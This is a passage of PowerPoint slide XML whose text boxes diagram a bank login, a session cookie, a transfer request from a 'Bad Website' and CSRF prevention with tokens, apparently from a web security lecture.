              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1791026D-AB96-4772-8260-C4ABA0A95DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6368475" y="1974975"/>
            <a:ext cx="2696197"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POST /login</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username: Lisa</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password: abc123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55AA764-90AC-4211-88B5-40DFF992A820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10211170" y="2911252"/>
            <a:ext cx="131491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solidFill>
              </a:rPr>
              <a:t>Creates session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06D2ADA-C4C2-46E3-B670-70DB62CD6615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9979104" y="3074326"/>
            <a:ext cx="0" cy="32927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A34134B-DF99-4D25-A027-70B63C1E7AB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5732763" y="3399700"/>
            <a:ext cx="4170997" cy="145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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F924D3FC-B6B6-401F-95A0-95E70AC22D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916700" y="3451183"/>
            <a:ext cx="206240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Create cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With session id. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85089FC5-B360-4370-87F6-CA2763FD3379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5732763" y="4003318"/>
            <a:ext cx="2484945"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 transfer page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F34D097-A5A6-4FB3-B1FE-458D76823C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5754746" y="3947418"/>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FD69710E-F995-48AA-AB3E-755E4F359518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5788784" y="4327688"/>
            <a:ext cx="4170997" cy="145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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ECAF378-F941-4270-BB6E-7A0D52DC9C8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056829" y="4415587"/>
            <a:ext cx="3034317"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Page</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Form with token.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create cookie with token.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Arrow Connector 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D909321B-87CF-4A6A-8AAB-7054031E9265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5754746" y="5218661"/>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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3B55654-CE58-4376-96BB-9AD2D355FC1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5709556" y="5255717"/>
            <a:ext cx="2804518" cy="1615827"/>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Transfer Money</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From: You</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To: Homer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amount: $10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Token sent in form.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Token sent in cookie.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Straight Connector 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CFD6444-B276-443F-8B42-197D046FD4B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9970925" y="5522886"/>
            <a:ext cx="0" cy="610857"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F0CF1D-1FB7-480D-BF36-82DB9995D5F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10123588" y="5487412"/>
            <a:ext cx="131491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solidFill>
              </a:rPr>
              <a:t>Checks tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Connector 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{270BE32E-9C35-480A-B2AC-4ECC61EA8B74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9979101" y="4177824"/>
            <a:ext cx="0" cy="139704"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B2E4E0-6854-4A70-9A6A-4A1B45FD2A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10112443" y="3956351"/>
            <a:ext cx="152319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solidFill>
              </a:rPr>
              <a:t>Generates token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42386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p:bldP spid="36" grpId="0"/>
      <p:bldP spid="38" grpId="0"/>
      <p:bldP spid="41" grpId="0"/>
      <p:bldP spid="43" grpId="0"/>
      <p:bldP spid="4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Preventing CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBCE107A-367E-4A91-B795-E8AB39C6F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1365" y="1252071"/>
            <a:ext cx="1372107" cy="1373793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{364EAECD-4B29-4766-9148-33F2CC83ACAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9837445" y="1493382"/>
            <a:ext cx="442249" cy="856306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C577EFEA-BBCE-4D19-A16A-91755058A587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857318" y="2394213"/>
            <a:ext cx="1600200" cy="424732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0B96A42-9C17-4E25-8524-23782D6448CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144138" y="2315158"/>
            <a:ext cx="1828862"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Bank Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F445CD2-8DBF-4034-A1A1-3192CF296F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5657418" y="2818945"/>
            <a:ext cx="1" cy="3333535"/>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D0E7786C-A90E-4105-9846-FBFFB54AD2B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10058569" y="2818945"/>
            <a:ext cx="1" cy="3333535"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25E25A37-7A9A-4A44-88DF-CB64CA49AE83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219000" y="1493382"/>
            <a:ext cx="442249" cy="856306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30805EEB-2ABF-4B8E-8356-E2FBCCAD9AB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1440124" y="2818945"/>
            <a:ext cx="1" cy="3333535"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABC3E942-27B2-4137-865F-2711072EE5D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411648" y="2349688"/>
            <a:ext cx="2056953"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Bad Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94361FBD-BEF1-4A65-A3AC-B83655902005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715015" y="2898305"/>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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1791026D-AB96-4772-8260-C4ABA0A95DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6368475" y="1974975"/>
            <a:ext cx="2477753"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Login</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username: Lisa</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lisaRules</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55AA764-90AC-4211-88B5-40DFF992A820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10211170" y="3053492"/>
            <a:ext cx="1314917"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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Creates session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06D2ADA-C4C2-46E3-B670-70DB62CD6615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9979104" y="3175926"/>
            <a:ext cx="0" cy="329274"/>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9A34134B-DF99-4D25-A027-70B63C1E7AB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5732763" y="3541940"/>
            <a:ext cx="4170997" cy="145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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F924D3FC-B6B6-401F-95A0-95E70AC22D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916700" y="3634063"/>
            <a:ext cx="2062401"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Create cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With session id. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38468B52-F232-4A07-B31B-5648AD48D06C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1589286" y="3798399"/>
            <a:ext cx="3998716" cy="2851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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85089FC5-B360-4370-87F6-CA2763FD3379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
